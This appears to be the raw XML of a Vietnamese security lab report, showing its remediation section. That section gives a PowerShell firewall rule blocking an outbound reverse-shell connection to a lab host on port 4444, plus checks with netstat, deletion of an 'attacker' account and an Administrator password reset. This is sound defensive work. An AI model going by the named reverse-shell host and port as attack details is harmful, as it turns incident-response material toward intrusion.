                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731200" cy="2654300"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="5658F61F"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2B30FC2" wp14:editId="5A706861">
            <wp:extent cx="5730875" cy="5105400"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="170" name="image175.png"/>
            <wp:cNvGraphicFramePr/>
            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                  <pic:nvPicPr>
                    <pic:cNvPr id="170" name="image175.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId82"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731200" cy="5105400"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DE6EEB6"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5614873" wp14:editId="20253D3E">
            <wp:extent cx="5730875" cy="4800600"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="91" name="image103.png"/>
            <wp:cNvGraphicFramePr/>
            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                  <pic:nvPicPr>
                    <pic:cNvPr id="91" name="image103.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId83"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731200" cy="4800600"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F6081B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FAB48B7" wp14:editId="79118279">
            <wp:extent cx="5730875" cy="4800600"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="42" name="image32.png"/>
            <wp:cNvGraphicFramePr/>
            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                  <pic:nvPicPr>
                    <pic:cNvPr id="42" name="image32.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId84"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731200" cy="4800600"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="045D8C99" w14:textId="77777777" w:rsidR="000D3737" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:spacing w:before="480"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="78" w:name="_heading=h.w14lkp7xr1ny" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkStart w:id="79" w:name="_Toc234664941"/>
      <w:bookmarkEnd w:id="78"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>8. Hướng dẫn xử lý</w:t>
      </w:r>
      <w:bookmarkEnd w:id="79"/>
    </w:p>
    <w:p w14:paraId="13E77CC3"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Chặn kết nối Reverse Shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32A9FAA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PowerShell </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>toàn bộ lệnh cùng một lúc</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E012917"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New-NetFirewallRule `</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D922415"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-DisplayName "Block ReverseShell" `</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A7F1377"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-Direction Outbound `</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="781AB443"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-Action Block `</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33826E3E"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-RemoteAddress 192.168.174.132 `</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DCC1CC3"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-Protocol TCP `</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A782F52"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-RemotePort 4444</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FBC2565" w14:textId="77777777" w:rsidR="000D3737" w:rsidRDefault="000D3737">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2FF36DE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Get-NetFirewallProfile | Format-Table Name,Enabled</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28CC2B6F" w14:textId="77777777" w:rsidR="000D3737" w:rsidRDefault="000D3737">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3BAB061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Get-NetFirewallRule -DisplayName "Block ReverseShell" | Get-NetFirewallAddressFilter</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B16304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netstat -ano | findstr 4444 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D46A79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FC74EAC" wp14:editId="0C21F9EC">
            <wp:extent cx="5730875" cy="3657600"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="94" name="image99.png"/>
            <wp:cNvGraphicFramePr/>
            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                  <pic:nvPicPr>
                    <pic:cNvPr id="94" name="image99.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId85"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731200" cy="3657600"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A978A71" w14:textId="77777777" w:rsidR="000D3737" w:rsidRDefault="000D3737">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="52A6FB4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E7D999F" wp14:editId="037B15CC">
            <wp:extent cx="5730875" cy="18161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86"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731200" cy="1816100"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B03822D" w14:textId="77777777" w:rsidR="000D3737" w:rsidRDefault="000D3737">
      <w:pPr>
        <w:spacing w:after="80"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="00A5E3F3"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Xóa User</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77268E7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net user attacker /delete</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D340CA7"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3FFECF5" wp14:editId="2C322F2C">
            <wp:extent cx="5730875" cy="2971800"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="105" name="image113.png"/>
            <wp:cNvGraphicFramePr/>
            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                  <pic:nvPicPr>
                    <pic:cNvPr id="105" name="image113.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId87"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731200" cy="2971800"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="70D62221"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Đổi Password Administrator</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3238B4BA" w14:textId="1336CCB4" w:rsidR="000D3737" w:rsidRPr="002D0247" w:rsidRDefault="00000000">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net user administrator *</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="000D37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37A3" w14:textId="77777777" w:rsidR="007158DF" w:rsidRDefault="007158DF">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="2CAC7DFE" w14:textId="77777777" w:rsidR="007158DF" w:rsidRDefault="007158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FFE2664-FC71-40FC-A706-0EE40FD39042}"/>
    <w:embedBold r:id="rId2" w:fontKey="{469FB707-2E9D-4F36-B5BA-FB95FF793A05}"/>
  </w:font>
  <w:font w:name="Consolas">
    <w:panose1 w:val="020B0609020204030204"/>
    <w:charset w:val="00"/>
    <w:family w:val="modern"/>
    <w:pitch w:val="fixed"/>
    <w:sig w:usb0="E00006FF" w:usb1="0000FCFF" w:usb2="00000001" w:usb3="00000000" w:csb0="0000019F" w:csb1="00000000"/>
    <w:embedRegular r:id="rId3" w:fontKey="{23622EEA-3535-488E-9A61-70DFDC92F44A}"/>
  </w:font>
  <w:font w:name="Cardo">
    <w:altName w:val="Segoe Print"/>
    <w:charset w:val="00"/>
    <w:family w:val="auto"/>
    <w:pitch w:val="default"/>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F94E895-E7C5-42EC-9724-DB1133D203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2432C" w14:textId="77777777" w:rsidR="007158DF" w:rsidRDefault="007158DF">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="02503349" w14:textId="77777777" w:rsidR="007158DF" w:rsidRDefault="007158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5CC"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="00D645CC"/>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CD4B1F"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="05CD4B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E671F9"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="05E671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37AA0"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="08137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FD188A"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="0FFD1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A67FB"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="101A67F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7574F3"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="14757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23FB2"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="17123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AF1854"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="18AF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DF5AC3"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="18DF5AC3"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="+"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="STXihei" w:eastAsia="STXihei" w:hAnsi="STXihei" w:hint="eastAsi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F0D6A3F"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="1F0D6A3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5C232C"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="245C23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CAE506C"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="2CAE506C"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="3"/>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07832CB"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="307832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0926D4"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="330926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014895"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="34014895"/>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7D22384"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="37D22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EB55C2"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="3BEB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430120"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="3D430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332921"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="403329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4E25398"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="44E25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4C512F"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="534C51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39B3272"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="539B3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8B4997"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="578B4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35566E"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="5B355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2E2F1D"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="5F2E2F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3C3513"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="603C3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CC1878"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="61CC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610DD9"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="68610DD9"/>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CB93900"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="6CB93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193142"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="6D193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15214B"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="7015214B"/>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4F36B25"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="74F36B25"/>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52B503A"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="752B5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7771441">
    <w:abstractNumId w:val="4"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="2009282126">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="1097629550">
    <w:abstractNumId w:val="29"/>
  </w:num>
  <w:num w:numId="4" w16cid:durableId="62797173">
    <w:abstractNumId w:val="18"/>
  </w:num>
  <w:num w:numId="5" w16cid:durableId="601962198">
    <w:abstractNumId w:val="17"/>
  </w:num>
  <w:num w:numId="6" w16cid:durableId="1883857675">
    <w:abstractNumId w:val="33"/>
  </w:num>
  <w:num w:numId="7" w16cid:durableId="638534066">
    <w:abstractNumId w:val="30"/>
  </w:num>
  <w:num w:numId="8" w16cid:durableId="1616402633">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="9" w16cid:durableId="697239777">
    <w:abstractNumId w:val="27"/>
  </w:num>
  <w:num w:numId="10" w16cid:durableId="1671786771">
    <w:abstractNumId w:val="24"/>
  </w:num>
  <w:num w:numId="11" w16cid:durableId="2131900471">
    <w:abstractNumId w:val="22"/>
  </w:num>
  <w:num w:numId="12" w16cid:durableId="710224658">
    <w:abstractNumId w:val="16"/>
  </w:num>
  <w:num w:numId="13" w16cid:durableId="1193499235">
    <w:abstractNumId w:val="23"/>
  </w:num>
  <w:num w:numId="14" w16cid:durableId="1654606449">
    <w:abstractNumId w:val="6"/>
  </w:num>
  <w:num w:numId="15" w16cid:durableId="1341393772">
    <w:abstractNumId w:val="10"/>
  </w:num>
  <w:num w:numId="16" w16cid:durableId="715617167">
    <w:abstractNumId w:val="26"/>
  </w:num>
  <w:num w:numId="17" w16cid:durableId="1409572359">
    <w:abstractNumId w:val="20"/>
  </w:num>
  <w:num w:numId="18" w16cid:durableId="983198302">
    <w:abstractNumId w:val="8"/>
  </w:num>
  <w:num w:numId="19" w16cid:durableId="2132819108">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="20" w16cid:durableId="343484580">
    <w:abstractNumId w:val="13"/>
  </w:num>
  <w:num w:numId="21" w16cid:durableId="2051953431">
    <w:abstractNumId w:val="7"/>
  </w:num>
  <w:num w:numId="22" w16cid:durableId="1341155140">
    <w:abstractNumId w:val="25"/>
  </w:num>
  <w:num w:numId="23" w16cid:durableId="1761632187">
    <w:abstractNumId w:val="5"/>
  </w:num>
  <w:num w:numId="24" w16cid:durableId="2128355275">
    <w:abstractNumId w:val="12"/>
  </w:num>
  <w:num w:numId="25" w16cid:durableId="961570868">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="26" w16cid:durableId="2118137008">
    <w:abstractNumId w:val="19"/>
  </w:num>
  <w:num w:numId="27" w16cid:durableId="1935243094">
    <w:abstractNumId w:val="21"/>
  </w:num>
  <w:num w:numId="28" w16cid:durableId="969937321">
    <w:abstractNumId w:val="14"/>
  </w:num>
  <w:num w:numId="29" w16cid:durableId="978654606">
    <w:abstractNumId w:val="11"/>
  </w:num>
  <w:num w:numId="30" w16cid:durableId="244341406">
    <w:abstractNumId w:val="32"/>
  </w:num>
  <w:num w:numId="31" w16cid:durableId="2111705765">
    <w:abstractNumId w:val="28"/>
  </w:num>
  <w:num w:numId="32" w16cid:durableId="1201281146">
    <w:abstractNumId w:val="31"/>
  </w:num>
  <w:num w:numId="33" w16cid:durableId="782268707">
    <w:abstractNumId w:val="15"/>
  </w:num>
  <w:num w:numId="34" w16cid:durableId="1345202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6CB"/>
    <w:rsid w:val="00047790"/>
    <w:rsid w:val="000801B7"/>
    <w:rsid w:val="000813F2"/>
    <w:rsid w:val="00091E90"/>
    <w:rsid w:val="000A68FE"/>
    <w:rsid w:val="000D0C31"/>
    <w:rsid w:val="000D3737"/>
    <w:rsid w:val="000E030C"/>
    <w:rsid w:val="001030E8"/>
    <w:rsid w:val="001112FC"/>
    <w:rsid w:val="00144A0A"/>
    <w:rsid w:val="001C1BBB"/>
    <w:rsid w:val="001C7AEA"/>
    <w:rsid w:val="002D0247"/>
    <w:rsid w:val="003133B1"/>
    <w:rsid w:val="00326D67"/>
    <w:rsid w:val="003501A6"/>
    <w:rsid w:val="00354786"/>
    <w:rsid w:val="00443EB6"/>
    <w:rsid w:val="00461D86"/>
    <w:rsid w:val="004A2DA6"/>
    <w:rsid w:val="004B1B62"/>
    <w:rsid w:val="0053088E"/>
    <w:rsid w:val="00552F82"/>
    <w:rsid w:val="006240D3"/>
    <w:rsid w:val="00654AC6"/>
    <w:rsid w:val="00684681"/>
    <w:rsid w:val="006B64B5"/>
    <w:rsid w:val="006D79AD"/>
    <w:rsid w:val="00712FAC"/>
    <w:rsid w:val="007158DF"/>
    <w:rsid w:val="007D151A"/>
    <w:rsid w:val="007F47BB"/>
    <w:rsid w:val="008059C1"/>
    <w:rsid w:val="00864F6E"/>
    <w:rsid w:val="008A4F40"/>
    <w:rsid w:val="008F2B92"/>
    <w:rsid w:val="009C17E9"/>
    <w:rsid w:val="009D6A35"/>
    <w:rsid w:val="00A33798"/>
    <w:rsid w:val="00A863F1"/>
    <w:rsid w:val="00A95A97"/>
    <w:rsid w:val="00AC2AC8"/>
    <w:rsid w:val="00B0471D"/>
    <w:rsid w:val="00BD7E0F"/>
    <w:rsid w:val="00BF14E2"/>
    <w:rsid w:val="00C4018B"/>
    <w:rsid w:val="00C91D84"/>
    <w:rsid w:val="00D214E3"/>
    <w:rsid w:val="00E126CB"/>
    <w:rsid w:val="00E4063B"/>
    <w:rsid w:val="00E7386E"/>
    <w:rsid w:val="00E751FA"/>
    <w:rsid w:val="00F11B3F"/>
    <w:rsid w:val="00F731B8"/>
    <w:rsid w:val="00FA1CBB"/>
    <w:rsid w:val="00FA499A"/>
    <w:rsid w:val="2B040C3B"/>
    <w:rsid w:val="77AA6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DE61"/>
  <w15:docId w15:val="{BB4DB973-F26C-4607-B717-CBA3AAC9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uiPriority w:val="9"/>
    <w:qFormat/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:spacing w:before="400" w:after="120"/>
      <w:jc w:val="center"/>
      <w:outlineLvl w:val="0"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
      <w:b/>
      <w:bCs/>
      <w:sz w:val="32"/>
      <w:szCs w:val="32"/>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sz w:val="28"/>
      <w:szCs w:val="28"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading3">
    <w:name w:val="heading 3"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:uiPriority w:val="9"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:spacing w:before="480" w:after="80"/>
      <w:outlineLvl w:val="2"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
      <w:i/>
      <w:iCs/>
      <w:sz w:val="28"/>
      <w:szCs w:val="28"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading4">
    <w:name w:val="heading 4"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:uiPriority w:val="9"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:spacing w:before="280" w:after="80"/>
      <w:outlineLvl w:val="3"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading5">
    <w:name w:val="heading 5"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:uiPriority w:val="9"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:spacing w:before="240" w:after="80"/>
      <w:outlineLvl w:val="4"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>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line="269" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:cstheme="minorBidi"/>
      <w:sz w:val="21"/>
      <w:szCs w:val="24"/>
      <w:lang w:val="vi-VN"/>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link w:val="TitleChar"/>
    <w:qFormat/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:spacing w:after="60"/>
    </w:pPr>
    <w:rPr>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08" w:type="dxa"/>
        <w:bottom w:w="0" w:type="dxa"/>
        <w:right w:w="108" w:type="dxa"/>
      </w:tblCellMar>
    </w:tblPr>
  </w:style>
  <w:style w:type="table" w:customStyle="1" w:styleId="Style18">
    <w:name w:val="_Style 18"/>
    <w:basedOn w:val="TableNormal0"/>
    <w:qFormat/>
    <w:tblPr>
      <w:tblCellMar>
        <w:top w:w="0" w:type="dxa"/>
        <w:left w:w="108" w:type="dxa"/>
        <w:bottom w:w="0" w:type="dxa"/>
        <w:right w:w="108"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108" w:type="dxa"/>
        <w:bottom w:w="0" w:type="dxa"/>
        <w:right w:w="108" w:type="dxa"/>
      </w:tblCellMar>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style>
  <w:style w:type="table" w:customStyle="1" w:styleId="Style35">
    <w:name w:val="_Style 35"/>
    <w:basedOn w:val="TableNormal0"/>
    <w:qFormat/>
    <w:tblPr/>
  </w:style>
  <w:style w:type="table" w:customStyle="1" w:styleId="Style36">
    <w:name w:val="_Style 36"/>
    <w:basedOn w:val="TableNormal0"/>
    <w:qFormat/>
    <w:tblPr/>
  </w:style>
  <w:style w:type="table" w:customStyle="1" w:styleId="Style37">
    <w:name w:val="_Style 37"/>
    <w:basedOn w:val="TableNormal0"/>
    <w:qFormat/>
    <w:tblPr/>
  </w:style>
  <w:style w:type="table" w:customStyle="1" w:styleId="Style38">
    <w:name w:val="_Style 38"/>
    <w:basedOn w:val="TableNormal0"/>
    <w:qFormat/>
    <w:tblPr/>
  </w:style>
  <w:style w:type="table" w:customStyle="1" w:styleId="Style39">
    <w:name w:val="_Style 39"/>
    <w:basedOn w:val="TableNormal0"/>
    <w:qFormat/>
    <w:tblPr/>
  </w:style>
  <w:style w:type="table" w:customStyle="1" w:styleId="Style40">
    <w:name w:val="_Style 40"/>
    <w:basedOn w:val="TableNormal0"/>
    <w:qFormat/>
    <w:tblPr/>
  </w:style>
  <w:style w:type="table" w:customStyle="1" w:styleId="Style41">
    <w:name w:val="_Style 41"/>
    <w:basedOn w:val="TableNormal0"/>
    <w:qFormat/>
    <w:tblPr/>
  </w:style>
  <w:style w:type="table" w:customStyle="1" w:styleId="Style42">
    <w:name w:val="_Style 42"/>
    <w:basedOn w:val="TableNormal0"/>
    <w:qFormat/>
    <w:tblPr/>
  </w:style>
  <w:style w:type="table" w:customStyle="1" w:styleId="Style43">
    <w:name w:val="_Style 43"/>
    <w:basedOn w:val="TableNormal0"/>
    <w:qFormat/>
    <w:tblPr/>
  </w:style>
  <w:style w:type="table" w:customStyle="1" w:styleId="Style44">
    <w:name w:val="_Style 44"/>
    <w:basedOn w:val="TableNormal0"/>
    <w:tblPr/>
  </w:style>
  <w:style w:type="table" w:customStyle="1" w:styleId="Style45">
    <w:name w:val="_Style 45"/>
    <w:basedOn w:val="TableNormal0"/>
    <w:qFormat/>
    <w:tblPr/>
  </w:style>
  <w:style w:type="table" w:customStyle="1" w:styleId="Style46">
    <w:name w:val="_Style 46"/>
    <w:basedOn w:val="TableNormal0"/>
    <w:qFormat/>
    <w:tblPr/>
  </w:style>
  <w:style w:type="table" w:customStyle="1" w:styleId="Style47">
    <w:name w:val="_Style 47"/>
    <w:basedOn w:val="TableNormal0"/>
    <w:qFormat/>
    <w:tblPr/>
  </w:style>
  <w:style w:type="table" w:customStyle="1" w:styleId="Style48">
    <w:name w:val="_Style 48"/>
    <w:basedOn w:val="TableNormal0"/>
    <w:qFormat/>
    <w:tblPr/>
  </w:style>
  <w:style w:type="table" w:customStyle="1" w:styleId="Style49">
    <w:name w:val="_Style 49"/>
    <w:basedOn w:val="TableNormal0"/>
    <w:qFormat/>
